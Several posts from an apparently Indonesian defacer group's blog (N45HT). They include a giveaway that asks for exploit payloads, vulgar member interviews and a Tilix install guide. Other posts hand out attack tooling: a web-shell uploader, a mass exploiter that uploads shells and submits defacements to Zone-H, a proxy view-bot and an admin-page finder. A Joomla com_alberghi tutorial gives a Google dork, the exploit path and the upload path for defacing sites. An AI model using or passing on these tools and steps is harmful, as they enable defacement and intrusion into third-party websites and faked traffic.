Giveaway Domain TLD - N45HT

Yooo wasap gaes.. wkwkwk, kembali lagi dengan blog paling kece sedunia dan gapernah update, wkwkwk...
Kali ini N45HT gak share tentang defacing lagi atau wawancara member, tapi kali ini N45HT mengadakan Giveaway.. Boom!....


Rules :
> Follow FansPage N45HT
> Share Poster GIVEAWAY ini
> Gunakan hashtag #NoFakeDomain
> Komentar dipostingan ini dan Tag 5 teman
> Selesaikan Challenge n45ht.web.id/challenge
> Jika sudah menyelesaikan challenge, bisa langsung mengirim SS/Payloads sesuai peraturan yang ada didalam n45ht.web.id/challenge
> Pemenang diambil hanya 5 orang pertama
> Pemenang ke1-2 mendapat domain.com dan pemenang ke3-5 mendapat subdomain n45ht (1 tahun)


Jadi di artikel ini mimin gabakal share answer atau berbagi jawaban dari ke 4 challenge nya wkwkwk, kalo challenge udah tutup aja baru mimin buatin artikel yang ngebahas jawaban challenge nya.
Disini mimin cuman ngeinformasiin aja buat kalian yang ingin join ke challengenya bisa langsung lihat di FansPage Official N45HT > https://goo.gl/3hBqqu

Sampai kapan giveaway ini?
Sampai mendapat kelima pemenang.

Pemenang dapat apa?
Pemenang pertama dan kedua mendapat domain.com sedangkan yang ketiga sampai kelima mendapat subdomain n45ht.

Berapa durasi domainnya?
Semua domain/sub berdurasi 1 tahun.


Yaudah lahh segitu aja informasinya, kalian bisa langsung join challengenya dengan klik link diatas.
Terimakasih xD

TheWawancara PART 2 - Member N45HT


N45HT - The Wawancara PART 2 - Yoo whatsup guys. Yokk kita wawancara lagi member N45HT, buat yang belom liat Wawancara Part 1, kalian bisa lihat di : TheWawancara PART 1 - Member N45HT.
Langsung simak saja jawaban jawaban beberapa member N45HT yang sedang diwawancara...


Apa Nick Kalian, dan Kenapa Milih Nick Itu?

  • JhonnyTheBay : "Karena Jhonny itu nama tytyd w :v".
     
  • Mr.13u4y4l4ut : "Ya karena gw suka buaya, ttp kalem".
     
  • Mr.Night Mare : "Karena mengingatkan manusia betapa seremnya mimpi buruk".
     
  • Mr.Rdz : "Karena itu nick game pertama".
     
  • PenggilaJav07 : "Karena gw sering col*".
     

Elu Wibu apa Bukan?

  • JhonnyTheBay : "Iyee".
     
  • Mr.13u4y4l4ut : "Bukan".
     
  • Mr.Night Mare : "Bukan".
     
  • Mr.Rdz : "Bukan".
     
  • PenggilaJav07 : "Bukan".
     

Kalo lu Wibu, Waifu Lu Siapa?

  • JhonnyTheBay : "Anaknya tuan krabb :v".
     
  • Mr.13u4y4l4ut : "Gw bukan wibu + gk suka anime / kartun lainnya".
     
  • Mr.Night Mare : "Mana saia tau bukan wibu titittttt".
     
  • Mr.Rdz : "....".
     
  • PenggilaJav07 : "Oni chan".
     

Sehari Fap-Fap Berapa Kali?

  • JhonnyTheBay : "Tergantung bacol :v"
     
  • Mr.13u4y4l4ut : "Berapa ya hmm jarang-jarang njirr".
     
  • Mr.Night Mare : "Tidak pernah kecuali sama cewe gw :D".
     
  • Mr.Rdz : "2".
     
  • PenggilaJav07 : "3 kali".
     

Pernah Bayangin Waifu Lu Gak Waktu Fap-Fap?

  • JhonnyTheBay : "Gak pernah, soalnya waifu gue bentuknya paus :3".
     
  • Mr.13u4y4l4ut : "Gw bukan wibu mana tau waifu itu apa".
     
  • Mr.Night Mare : "Gk pernah anti wibu wibu".
     
  • Mr.Rdz : "Gak".
     
  • PenggilaJav07 : "Pernah".
     

50 Domain Perawan DefacerID apa 10 Domain Perawan Zone-H?

  • JhonnyTheBay : "10 perawan zone-h. Ama perawan cewe juga w mau".
     
  • Mr.13u4y4l4ut : "10 domain perawan zone-h".
     
  • Mr.Night Mare : "10 domain perawan zone-h".
     
  • Mr.Rdz : "Zone-h".
     
  • PenggilaJav07 : "10 domain perawan zone-h".
     

Mirror Archive DefacerID apa Onhold 7 Tahun di Zone-H?

  • JhonnyTheBay : "Btw belom pernah main ke zone-h wkwkwk. Masik pakum :'v".
     
  • Mr.13u4y4l4ut : "Archive di defacerid".
     
  • Mr.Night Mare : "Onhold 7 tahun di zone-h".
     
  • Mr.Rdz : "Lupa".
     
  • PenggilaJav07 : "Onhold 7 tahun di zone-h".
     

Yaa jadi begitulahh Ketika member N45HT diwawancara, cuman si JhonnyTheBay doang ea yang wibu :v.
Sekian dulu Wawancaranya, buat kalian yang belom liat Wawancara Part 1, kalian bisa lihat di : TheWawancara PART 1 - Member N45HT. Terimakasih sudah berkunjung.

N45HT Uploader by Anti_Fr4g



Hai sobat N45HT, kali ini gw mau share uploader N45HT yang dibuat oleh Anti_Fr4g. Untuk screenshot dari uploader ini bisa kalian lihat diatas.

Gausah banyak omong lagi, langsung saja kalian download uploadernya dibawah ini,



Oke, sekian dulu artikel hari ini, terimakasih telah berkunjung.
Special thanks : Anti_Fr4g & SCYTHE404_LOL

Auto Exploiter File Attachment + Zone-H


Disaat yang berbahagia ini, ane mau share auto exploiter File Attachment + Auto Submit Zone-H, Okelah njirr, langsung saja ke tutorialnya nya :v

  • Script Exploiter : https://pastebin.com/eS1qNngR
  • Cara menjalankan exploiter ini, masukkan perintah dibawah ini,
    php nama_exploiter.php
  • Setelah memasukkan perintah diatas, lalu masukkan list target yang berisi target File Attachment kalian.
  • Untuk shell dan nick zone-h, kalian ganti pada bagian seperti pada screenshots di bawah ini.
    $shell = "indoxx.txt";
    $nickzoneh = "N45HT";
  • Setelah itu biarkan exploiternya berjalan...

nb : Jika "Checking Path : 200 OK" tapi Gagal upload shell, coba manual.
Sekian dulu artikel hari ini, semoga bermanfaat, terimakasih sudah berkunjung.

TheWawancara PART 1 - Member N45HT


N45HT - The Wawancara PART 1 - Yoo whatsup guys, mager mau nulis artikel panjang lebar sama bingung juga mau posting artkel apaan, jadi kita wawancara saja member n45ht. Langsung simak saja jawaban jawaban beberapa member N45HT yang sedang diwawancara...


Apa Nick Kalian, dan Kenapa Milih Nick Itu?

  • Mr.x0x : "W dulu terinspirasi dari film, film yang ceritanya manusia yg nge hek pesawat alien terus diberi simbol x0x :v".

  • Comod0x : "Comod0x itu komodo, terus beri simbol 0x".

  • FRU_403 : "Awalnya dari temen sekelas gua udah punya nick semua buat game atau apalah itu yang berhubungan dengan IT, Bingung pilih nick apaan, yo wes pilih nick ini ae. FR itu FORBIDDEN, U itu User dan 403 itu page error forbidden-nya website".

  • Mr. Rabbit : "Terinspirasi creepypasta Mask Rabbit :v, jadi yaa Mr.Rabbit".

  • Noob_Orb : "Ya gw memilih itu sebagai motivasi gw juga biar gw gk sombong dan masih terus belajar".

  • PETR03X : "Ora neko2 :v".

  • SCYTHE404_LOL : "Gw milih nick ini karna gw dulu sering dengerin lagu Throne - Bring Me The Horizon, dan disitu ada lirik yang ada kata Scythe. 404 gw terinspirasi dari orang dulu siapa gw lupa, yang jelas nick dia ada 404 nya. Kalo LOL itu dari temen gw karna sering ngomong LOL".

  • Mr.Blank007/Grav3 : "Gw milih mr.blank007 karna itu punya makna, Mr = laki laki, blank = kuuhaku(inisial tim yang gw kagumi di anime ngnl), 007 = gw suka karakter dari james bon.
    Kenapa gw ganti nik? Alasan pertama itu nik terlalu panjang dan susah diketik, Alasan kedua, niknya terlalu alay buat anak seperti gw, gw milih nik grav3 karna memiliki arti kuburan yang keliatannya "silent dan orang g banyak peduliin" dan juga itu nik gampang diketik dan diingat. Dah itu aja".

Kenapa Tertarik di Dunia TernakLele(Dunia Hacking) Ini ?

  • Comod0x : "1 Jawaban $1".

  • FRU_403 : "Iseng iseng doang".

  • Mr.Rabbit : "Ternak lele:v, w suka ikan lele, apalagi pecel lele. Tertarik sama pembelajarannya".

  • Noob_Orb : "Anjer ternak lele, gw ternak ikan cupang".

  • SCYTHE404_LOL : "Pengen coba hal baru".

First POC apa?

  • Comod0x : "1 Jawaban $1".

  • FRU_403 : "SQL Injection".

  • Mr.Rabbit : "Com Fabrik".

  • Noob_Orb : "SQL Injection".

  • SCYTHE404_LOL : "Magento Add Admin".

POC Yang di Sukai Apa?

  • Comod0x : "1 Jawaban $1".

  • FRU_403 : "SQL Injection".

  • Mr.Rabbit : "Drupal".

  • Noob_Orb : "SQL Injection".

  • SCYTHE404_LOL : "Bypass Admin [NoRedirect]".

Pendapatnya Tentang Sistem Keamanan di Indonesia.

  • Comod0x : "Sistem Keamanan di Indonesia cukup prihatin yak :v. Yang bocah-bocah depeser juga gak tau diri.. Asal deface aja apalagi yang nebas index tanpa backup".

  • Mr.Rabbit : "Kadang gampang ke inject, apalagi golongan web kalimantan".

  • Noob_Orb : "Ya sebenarnya sudah cukup bagus, tapi tetap saja harus ditingkatkan".

  • SCYTHE404_LOL : "Masih kurang, percuma punya dana besar tapi sistem keamanannya lemah".


Jadi bisa disimpulkan ya si Comod0x minta uang mulu kalo ditanya in :v yakali 1 Dollar 1 Jawaban :v.
Yaudah lahh, sekian dulu wawancara nya, nanti pasti dilanjut ke Part 2 dan yang belum diwawancara nanti juga pasti kebagian wawancaranya.
Sekian dan terimakasih.

Simpel Bot Auto Views dengan Proxy


Halo kawan kawan, sudah lama neh ane kg posting, wkwkkw soalnya juga sibuk. Okelah, kali ini ane mau share Simple Bot Auto Views dengan Proxy. Untuk lebih lengkapnya kalian bisa langsung simak tutorial di bawah ini..

  • Script Bot : https://pastebin.com/uqUnH4b3
  • Langkah yang pertama, kalian download script bot diatas lalu simpan dengan ekstensi .php.
  • Buat file.txt yang berisi list proxy http/https.
  • Untuk site yang akan di bot, kalian edit script dan cari bagian seperti dibawah ini
    curl_setopt($chi, CURLOPT_URL, "http://blog.n45ht.web.id");
    Ganti pada bagian http://blog.n45ht.web.id
  • Lalu untuk menjalankan botnya, kalian masukkan perintah
    php file_bot.php
    Lalu masukkan file.txt yang berisi list prox.

 Sekian dulu tutorial hari ini, semoga bermanfaat, terimakasih sudah berkunjung ^_^

Install Tilix (Terminix) di Linux, Terminal Emulator Cantik yang Mempunyai Banyak Fitur

Tilix adalah sebuah aplikasi Terminal emulator dengan berbagai kemampuan dan fitur tambahan. Tilix yang sebelumnya bernama Terminix ini, dibuat berbasiskan GTK3. Tilix dibuat dengan mengikuti peraturan Gnome Human Interface Guidelines (HIG).
Aplikasi Terminal emulator ini cukup ringan sehingga berjalan dengan sangat powerful, Tilix juga memiliki tampilan cantik yang dapat dikustom sesuai dengan keinginan dan mempunyai segudang fitur yang dapat memudahkan kamu dalam penggunaannya.


Tilix memungkinkan kamu menjalankan lebih dari satu sesi Terminal. Sesi tersebut dapat kamu jalankan dengan menekan tombol “+” di bagian bar atas aplikasi seperti membuka sebuah tab baru di browser web. Kamu juga dapat dengan mudah baralih dari satu sesi ke satu sesi lainnya dari menu bar tersebut.
Sesi Pada Tilix
Sesi Pada Tilix
Kemudian Tilix juga memungkinkan untuk membuat mutiple panes, dimana kamu dapat membuat beberapa panel atau bagian dalam satu buah sesi. Panel-panel tersebut dapat dibuat dalam jumlah yang tidak tarbatas, kamu bisa dengan mudah membagi Terminal dalam berapa bagian atau panel secara horizontal ataupun vertikal.
Mutiple Panes Pada Tilix
Mutiple Panes Pada Tilix
Tilix juga customizable, kamu dapat melakukan kustomisasi pada Terminal emulator Tilix dengan membuat atau menambah profile baru. Kamu bisa mengubah jenis huruf, ukuran huruf, warna, tampilan, menambahkan background pada Terminal dan sebagainya dengan menggunakan aplikasi Terminal emulator Tilix.


Selain fitur-fitur tersebut, masih ada banyak kemampuan lain yang dimiliki oleh Tilix seperti notifikasi, mendukung pemberian nama judul, setiap sesi bisa menggunakan profile yang berbeda, ukuran bisa diatur dengan cara drag and drop serta bisa digunakan sebagai dropdown Terminal dan banyak kemampuan-kemampuan lainnya.


Install Tilix di Ubuntu dan Turunan Menggunakan PPA Repository

Jika kamu menggunakan Ubuntu 16.04, Ubuntu 16.10, Ubuntu 17.04 serta turunannya seperti Linux Mint 8.x dan lainnya. Kamu bisa menginstall Tilix pada komputer kamu dengan menggunakan PPA repository.
Buka Terminal pada komputer kamu dengan menekan kombinasi keyboard CTRL + ALT + T atau buka Terminal melalui menu aplikasi.
Kemudian masukkan perintah berikut pada Terminal untuk menambahkan PPA repository dari Tilix. Kamu bisa meng-copy perintah tersebut dan paste pada Terminal dengan menekan kombinasi CTRL + SHIFT+ V:
sudo add-apt-repository ppa:webupd8team/terminix
Tunggu proses penambahnan repository hingga selesai. Kemudian lakukan update untuk memperbaharui daftar repository dan daftar aplikasi dengan memasukkan perintah berikut di Terminal:
sudo apt-get update


Tunggu proses update hingga selesai. Kemudian install Tilix dengan memasukkan perintah berikut di Terminal:
sudo apt-get install tilix
Tunggu proses instalasi hingga selesai dan pastikan tidak ada error pada saat proses instalasi. Jika instalasi sudah selesai dan berhasil, kamu dapat membuka Tilix melalui menu aplikasi dan mulai menggunakannya.

Install Tilix di Linux Menggunakan Source Code

Selain menginstall melalui PPA, kamu juga bisa menginstall Tilix dari menggunakan source code langsung. Cara ini bukan hanya bisa di lakukan pada Ubuntu atau turunannya, juga pada distribusi-ditribusi Linux yang lain.
Unduh file source code dari Tilix di halaman Github Tilix berikut. Unduh source code dari Tilix tersebut dalam bentuk dalam file zip yang bernama “tilix.zip”. Setelah proses unduhan selesai, file hasil unduhan tersebut akan berada pada folder Downloads.
Buka Terminal pada komputer kamu, karena file hasil unduhan tersebut berada pada folder Downloads, masukkan perintah berikut pada Terminal untuk masuk ke direktori Downloads:
cd ~/Downloads
Jika sudah berhasil masuk direktori dimana file tersebut berada, selanjutnya ekstrak terlebih dahulu file zip tersebut dengan memasukkan perintah berikut di Terminal:
sudo unzip tilix.zip -d /
Kemudian setelah berhasil mengekstrak file tersebut, lakukan compile source code dari Tilix dengan menggunakan perintah berikut di Terminal:
sudo glib-compile-schemas /usr/share/glib-2.0/schemas/

 Tunggu proses compile hingga selesai dan pastikan berhasil dengan baik. Jika sudah selesai, kamu dapat menjalankan dan mulai menggunakan Tilix dengan membukanya melalui menu aplikasi.

Admin Finder ala N45HT

Yoo whatsup guys, kali ini ane mau share Admin Finder ala N45HT, langsung saja simak dibawah ini...

Baca Juga : Cara Menjalankan Xploiter PHP di Windows

  • Yang pertama kalian download dulu Script Admin Finder dan Wordlist Admin Page nya, lalu kalian letakkan di direktori php pada xampp, contoh C:/xampp/php
  • Setelah itu buka cmd, pergi ke direktori C:/xampp/php dengan memasukkan perintah cd/xampp/php
  • Lalu masukkan perintah dibawah ini untuk menjalankan admin findernya
    php namafile.php
  • Masukkan target dan wordlist admin page yang sudah di download tadi
nb * wordlist admin page nya bisa kalian tambah sendiri


Oke sekian tutorial buat hari ini, terimakasih sudah berkunjung.

Joomla com_alberghi Arbitrary File Upload Vulnerability


Hello sobat N45HT, apa kabar? udah lama nehh kg posting di blog ini, wkwkwk. Kali ini ane mau posting cara deface dengan com_alberghi, vulnerability ini terdapat pada CMS Joomla. Langsung sumak saja tutorial dibawah ini,

  • Google dork : inurl:com_alberghi
  • Exploit : /administrator/components/com_alberghi/upload.alberghi.php
  • Path : /administrator/components/com_alberghi/file.jpg
  • Yang pertama seperti biasa, kalian ngedork dulu pake dork diatas, lalu masukkan exploit dan jika vuln maka tampilannya akan seperti di bawah ini.
    Langsung saja kalian upload file.jpg kalian.

  • Jika sudah selesai upload file kalian, buka file kalian di site.com/administrator/components/com_alberghi/file.jp


Oke, segini aja buat hari ini, terimakasih sudah berkunjung.